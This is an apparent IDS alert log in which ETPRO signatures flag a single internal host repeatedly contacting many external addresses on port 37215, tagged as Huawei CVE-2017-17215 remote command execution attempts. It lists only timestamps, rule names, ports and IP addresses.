                                                    07/10/24-08:26:41.535361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4582637215192.168.2.14157.24.159.244
                                                    07/10/24-08:26:57.679549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6028437215192.168.2.14197.162.71.220
                                                    07/10/24-08:27:11.568589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3753237215192.168.2.14197.159.250.22
                                                    07/10/24-08:27:22.535302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5817437215192.168.2.14157.231.136.55
                                                    07/10/24-08:27:19.236089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3388637215192.168.2.1447.154.145.123
                                                    07/10/24-08:26:38.565170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3824837215192.168.2.14197.92.34.189
                                                    07/10/24-08:26:53.247062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4934437215192.168.2.14157.35.174.216
                                                    07/10/24-08:26:57.510241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3804637215192.168.2.14193.43.196.76
                                                    07/10/24-08:26:15.819224TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3790837215192.168.2.1473.69.77.111
                                                    07/10/24-08:26:59.603648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4649837215192.168.2.14157.37.104.41
                                                    07/10/24-08:27:33.764510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5853037215192.168.2.14197.226.242.16
                                                    07/10/24-08:26:55.423552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5031237215192.168.2.1441.135.85.99
                                                    07/10/24-08:26:59.728995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5876637215192.168.2.1441.42.250.1
                                                    07/10/24-08:27:14.844780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4775037215192.168.2.14120.225.206.229
                                                    07/10/24-08:27:28.176056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5611237215192.168.2.1441.61.108.2
                                                    07/10/24-08:26:55.278006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4972437215192.168.2.14197.4.73.108
                                                    07/10/24-08:27:33.897517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3937837215192.168.2.14207.164.83.110
                                                    07/10/24-08:26:28.784417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3756437215192.168.2.1441.230.104.58
                                                    07/10/24-08:26:43.831201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3764037215192.168.2.1441.202.147.23
                                                    07/10/24-08:26:28.926953TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4568637215192.168.2.14197.251.235.140
                                                    07/10/24-08:26:20.098304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5773037215192.168.2.14157.226.51.193
                                                    07/10/24-08:27:24.983854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3448037215192.168.2.14181.26.159.243
                                                    07/10/24-08:27:19.321754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5309237215192.168.2.14159.20.109.163
                                                    07/10/24-08:26:41.285291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5623437215192.168.2.1441.49.44.228
                                                    07/10/24-08:26:31.081032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3338237215192.168.2.14157.181.173.197
                                                    07/10/24-08:26:25.474716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6043437215192.168.2.1467.131.44.115
                                                    07/10/24-08:26:11.565861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4013037215192.168.2.1441.209.73.122
                                                    07/10/24-08:26:23.318563TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5162437215192.168.2.14222.30.131.186
                                                    07/10/24-08:26:59.716345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3319037215192.168.2.14157.93.30.120
                                                    07/10/24-08:26:11.177651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5570637215192.168.2.14197.57.176.135
                                                    07/10/24-08:27:07.376738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4511437215192.168.2.14197.228.194.191
                                                    07/10/24-08:26:49.828645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5890437215192.168.2.14157.4.168.103
                                                    07/10/24-08:26:29.864679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3706237215192.168.2.14157.205.122.56
                                                    07/10/24-08:26:14.623254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3456637215192.168.2.14166.77.33.93
                                                    07/10/24-08:27:13.896003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4394437215192.168.2.14157.226.247.179
                                                    07/10/24-08:26:53.157314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4019437215192.168.2.1441.108.224.5
                                                    07/10/24-08:26:45.639847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4878237215192.168.2.1448.104.197.188
                                                    07/10/24-08:27:07.265553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4864437215192.168.2.14197.85.242.168
                                                    07/10/24-08:26:59.623619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6021237215192.168.2.14197.166.17.35
                                                    07/10/24-08:27:27.096599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5753837215192.168.2.14157.99.58.20
                                                    07/10/24-08:26:59.667282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4696237215192.168.2.1441.136.212.103
                                                    07/10/24-08:27:02.722958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4571237215192.168.2.14157.254.73.96
                                                    07/10/24-08:27:08.412825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3480637215192.168.2.1441.241.177.152
                                                    07/10/24-08:26:38.613798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5840837215192.168.2.14157.72.178.91
                                                    07/10/24-08:26:48.011006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3880037215192.168.2.14197.115.225.191
                                                    07/10/24-08:26:26.597424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4717837215192.168.2.1441.90.73.248
                                                    07/10/24-08:26:22.258130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4243237215192.168.2.14197.49.178.41
                                                    07/10/24-08:26:23.354266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3648637215192.168.2.1441.212.125.193
                                                    07/10/24-08:26:59.662577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5062237215192.168.2.14157.240.165.124
                                                    07/10/24-08:27:19.151496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4743637215192.168.2.14197.180.113.85
                                                    07/10/24-08:27:22.482500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3947237215192.168.2.14197.41.104.133
                                                    07/10/24-08:26:26.510186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4713037215192.168.2.14157.98.246.41
                                                    07/10/24-08:27:19.306995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5707437215192.168.2.14197.104.159.239
                                                    07/10/24-08:27:32.587332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4757037215192.168.2.1441.247.104.34
                                                    07/10/24-08:26:23.351909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3587837215192.168.2.14197.116.90.202
                                                    07/10/24-08:26:55.433517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5496837215192.168.2.14223.10.102.238
                                                    07/10/24-08:27:08.389862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3542637215192.168.2.1441.157.192.224
                                                    07/10/24-08:26:28.933010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3640837215192.168.2.14157.86.208.159
                                                    07/10/24-08:26:13.794548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3442237215192.168.2.14157.239.242.139
                                                    07/10/24-08:26:29.826099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5214637215192.168.2.14157.83.14.147
                                                    07/10/24-08:27:27.144985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5546637215192.168.2.14197.224.99.62
                                                    07/10/24-08:27:02.991473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3337037215192.168.2.1441.3.74.224
                                                    07/10/24-08:26:13.811202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5056637215192.168.2.1444.87.16.33
                                                    07/10/24-08:26:23.352655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5157637215192.168.2.1441.98.165.100
                                                    07/10/24-08:27:08.417539TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4255637215192.168.2.14157.87.128.66
                                                    07/10/24-08:27:17.066216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4540237215192.168.2.14208.14.190.159
                                                    07/10/24-08:26:38.557842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5237837215192.168.2.14106.64.100.130
                                                    07/10/24-08:27:22.573004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4799637215192.168.2.1441.254.230.121
                                                    07/10/24-08:27:08.314829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4992437215192.168.2.14197.80.7.162
                                                    07/10/24-08:26:45.651870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5259837215192.168.2.14157.78.2.93
                                                    07/10/24-08:26:55.278007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4540437215192.168.2.14157.115.253.57
                                                    07/10/24-08:26:28.635714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5326637215192.168.2.14197.138.32.125
                                                    07/10/24-08:26:13.778927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5064437215192.168.2.1491.77.13.177
                                                    07/10/24-08:27:08.444805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5508037215192.168.2.14157.232.171.116
                                                    07/10/24-08:27:08.444805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3787437215192.168.2.14197.74.124.6
                                                    07/10/24-08:27:22.839060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4290437215192.168.2.14197.251.189.90
                                                    07/10/24-08:26:38.603168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4638237215192.168.2.1441.250.205.215
                                                    07/10/24-08:26:28.918557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5890237215192.168.2.14159.185.41.30
                                                    07/10/24-08:27:05.140242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5356637215192.168.2.14197.47.20.169
                                                    07/10/24-08:27:20.492673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4434837215192.168.2.1497.245.252.77
                                                    07/10/24-08:27:33.874672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131837215192.168.2.1441.254.73.109
                                                    07/10/24-08:26:47.844499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4694637215192.168.2.14217.224.239.19
                                                    07/10/24-08:27:05.150290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5579237215192.168.2.1441.83.217.214
                                                    07/10/24-08:27:33.854360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4117037215192.168.2.14157.8.222.232
                                                    07/10/24-08:26:17.962280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4974037215192.168.2.1441.188.142.243
                                                    07/10/24-08:26:49.855576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4896037215192.168.2.14157.188.164.88
                                                    07/10/24-08:26:11.545606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4427037215192.168.2.1495.166.133.4
                                                    07/10/24-08:27:05.209381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5887637215192.168.2.14157.51.252.122
                                                    07/10/24-08:27:22.573004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3807437215192.168.2.14157.169.182.160
                                                    07/10/24-08:26:52.021127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5834237215192.168.2.1454.153.71.159
                                                    07/10/24-08:27:10.629706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4860837215192.168.2.14157.111.151.192
                                                    07/10/24-08:27:30.521330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4377237215192.168.2.14157.95.140.48
                                                    07/10/24-08:26:28.775037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3930037215192.168.2.14157.62.33.234
                                                    07/10/24-08:27:33.758837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5220637215192.168.2.1435.151.241.207
                                                    07/10/24-08:26:28.861784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5610037215192.168.2.14194.67.111.5
                                                    07/10/24-08:27:23.965651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4241237215192.168.2.14219.108.167.94
                                                    07/10/24-08:26:14.762388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5667837215192.168.2.1441.226.57.228
                                                    07/10/24-08:26:36.433222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3552037215192.168.2.1441.111.187.180
                                                    07/10/24-08:26:11.529924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6083237215192.168.2.14157.189.254.100
                                                    07/10/24-08:26:47.835000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5677237215192.168.2.14146.33.33.62
                                                    07/10/24-08:27:02.789952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4870037215192.168.2.1441.227.250.112
                                                    07/10/24-08:26:53.202675TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4937437215192.168.2.14157.111.200.182
                                                    07/10/24-08:26:25.449371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4685237215192.168.2.14157.10.86.157
                                                    07/10/24-08:27:23.482835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5882237215192.168.2.1418.194.153.0
                                                    07/10/24-08:26:43.561007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5858637215192.168.2.1441.155.6.128
                                                    07/10/24-08:26:31.056369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4486837215192.168.2.14197.122.154.92
                                                    07/10/24-08:26:25.429135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4874037215192.168.2.14197.168.201.129
                                                    07/10/24-08:27:28.179104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3721437215192.168.2.14157.26.112.47
                                                    07/10/24-08:26:26.563571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4202637215192.168.2.14197.255.125.69
                                                    07/10/24-08:26:14.814365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4724837215192.168.2.14197.138.182.14
                                                    07/10/24-08:26:15.831289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4936637215192.168.2.14222.194.67.105
                                                    07/10/24-08:27:02.831621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5527837215192.168.2.1420.18.109.234
                                                    07/10/24-08:26:29.766874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5883637215192.168.2.14157.179.148.66
                                                    07/10/24-08:26:14.819736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6078237215192.168.2.14157.208.77.12
                                                    07/10/24-08:26:22.227550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3492837215192.168.2.14153.72.233.186
                                                    07/10/24-08:27:32.590105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4451437215192.168.2.14157.1.62.15
                                                    07/10/24-08:27:05.148384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4538437215192.168.2.1441.40.58.65
                                                    07/10/24-08:27:14.885671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5345037215192.168.2.1441.30.211.180
                                                    07/10/24-08:27:19.349992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4928237215192.168.2.14157.208.193.66
                                                    07/10/24-08:27:19.289200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5665037215192.168.2.14197.109.136.36
                                                    07/10/24-08:27:34.124417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3383437215192.168.2.141.132.53.84
                                                    07/10/24-08:27:19.230409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3347037215192.168.2.14157.103.183.116
                                                    07/10/24-08:27:28.162880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4544637215192.168.2.14197.40.127.182
                                                    07/10/24-08:26:15.873378TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4487037215192.168.2.14157.38.49.193
                                                    07/10/24-08:27:05.156196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4127637215192.168.2.1441.212.184.135
                                                    07/10/24-08:27:19.306994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5091437215192.168.2.1441.202.32.127
                                                    07/10/24-08:26:28.876490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4984437215192.168.2.14207.166.243.232
                                                    07/10/24-08:27:05.230730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5698837215192.168.2.1441.124.132.154
                                                    07/10/24-08:26:43.530695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4538837215192.168.2.1441.209.37.45
                                                    07/10/24-08:27:23.924578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3597237215192.168.2.14184.147.107.26
                                                    07/10/24-08:27:17.088897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4325237215192.168.2.14197.141.232.248
                                                    07/10/24-08:26:53.181410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3846837215192.168.2.1441.179.96.144
                                                    07/10/24-08:26:48.002898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4709637215192.168.2.14157.131.65.196
                                                    07/10/24-08:26:18.012780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4420437215192.168.2.1495.181.29.177
                                                    07/10/24-08:26:42.346552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3282837215192.168.2.1441.36.64.209
                                                    07/10/24-08:26:22.218998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4356037215192.168.2.14157.27.175.103
                                                    07/10/24-08:26:33.182534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5922837215192.168.2.1445.175.48.130
                                                    07/10/24-08:27:22.535302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3313637215192.168.2.14197.164.77.229
                                                    07/10/24-08:26:42.387437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4505637215192.168.2.1478.129.55.138
                                                    07/10/24-08:27:07.355294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6016237215192.168.2.14157.56.130.3
                                                    07/10/24-08:26:31.111831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3710037215192.168.2.14197.214.223.150
                                                    07/10/24-08:26:13.655668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3543837215192.168.2.1441.98.73.252
                                                    07/10/24-08:27:28.166168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4793637215192.168.2.14142.196.231.190
                                                    07/10/24-08:27:31.478959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4878637215192.168.2.14197.209.216.250
                                                    07/10/24-08:27:22.838932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5822037215192.168.2.14157.52.59.246
                                                    07/10/24-08:26:36.368496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3364437215192.168.2.1441.154.71.171
                                                    07/10/24-08:26:25.518059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5720037215192.168.2.14178.210.208.107
                                                    07/10/24-08:26:14.826871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4724037215192.168.2.14114.50.72.209
                                                    07/10/24-08:26:29.829740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4378237215192.168.2.14157.32.54.192
                                                    07/10/24-08:26:22.296944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5060837215192.168.2.1441.169.22.166
                                                    07/10/24-08:26:29.776288TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5796637215192.168.2.14195.88.11.252
                                                    07/10/24-08:26:57.637294TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3374037215192.168.2.14157.71.228.236
                                                    07/10/24-08:27:30.562058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4830037215192.168.2.14111.39.144.149
                                                    07/10/24-08:27:14.821863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4954237215192.168.2.1424.19.18.115
                                                    07/10/24-08:27:30.516859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3400637215192.168.2.14157.202.52.195
                                                    07/10/24-08:27:28.115702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5446237215192.168.2.1451.245.52.217
                                                    07/10/24-08:26:29.855669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3889837215192.168.2.1441.194.12.74
                                                    07/10/24-08:26:59.652707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4479037215192.168.2.1441.126.132.100
                                                    07/10/24-08:27:33.862601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3984837215192.168.2.1414.165.220.31
                                                    07/10/24-08:26:23.342847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5396237215192.168.2.1499.88.67.211
                                                    07/10/24-08:27:17.034911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5647637215192.168.2.14197.249.158.162
                                                    07/10/24-08:27:27.172380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6072237215192.168.2.14199.227.107.223
                                                    07/10/24-08:26:28.757410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3942637215192.168.2.1441.215.129.139
                                                    07/10/24-08:26:29.854453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4538437215192.168.2.14108.178.90.57
                                                    07/10/24-08:26:47.804395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4100637215192.168.2.14157.136.231.18
                                                    07/10/24-08:26:29.790655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5738037215192.168.2.1441.59.54.248
                                                    07/10/24-08:26:15.823696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5509037215192.168.2.14197.70.26.237
                                                    07/10/24-08:27:30.406012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3375437215192.168.2.14157.177.98.176
                                                    07/10/24-08:26:11.575874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4285837215192.168.2.1441.227.69.31
                                                    07/10/24-08:26:31.110610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5944637215192.168.2.14157.37.233.180
                                                    07/10/24-08:27:02.954734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3466837215192.168.2.14157.56.233.175
                                                    07/10/24-08:26:17.954473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3765037215192.168.2.14157.119.106.159
                                                    07/10/24-08:26:51.950899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4074837215192.168.2.14209.239.121.53
                                                    07/10/24-08:26:47.992433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4478837215192.168.2.14150.57.67.212
                                                    07/10/24-08:26:23.280858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4758037215192.168.2.14157.157.177.101
                                                    07/10/24-08:27:22.936367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5684037215192.168.2.1441.6.158.123
                                                    07/10/24-08:26:59.529956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5300637215192.168.2.14202.40.232.210
                                                    07/10/24-08:26:13.794686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5519037215192.168.2.1452.42.76.224
                                                    07/10/24-08:26:57.522324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5365037215192.168.2.14157.41.242.89
                                                    07/10/24-08:27:02.982292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5784037215192.168.2.1478.253.37.146
                                                    07/10/24-08:27:22.896648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5709437215192.168.2.1441.158.91.55
                                                    07/10/24-08:26:41.443914TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4769837215192.168.2.14197.221.238.117
                                                    07/10/24-08:26:59.873449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3946437215192.168.2.14157.152.216.165
                                                    07/10/24-08:27:08.439575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4157637215192.168.2.14157.140.235.15
                                                    07/10/24-08:26:18.012049TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6028637215192.168.2.1459.202.162.173
                                                    07/10/24-08:27:08.421271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4560437215192.168.2.14197.25.81.110
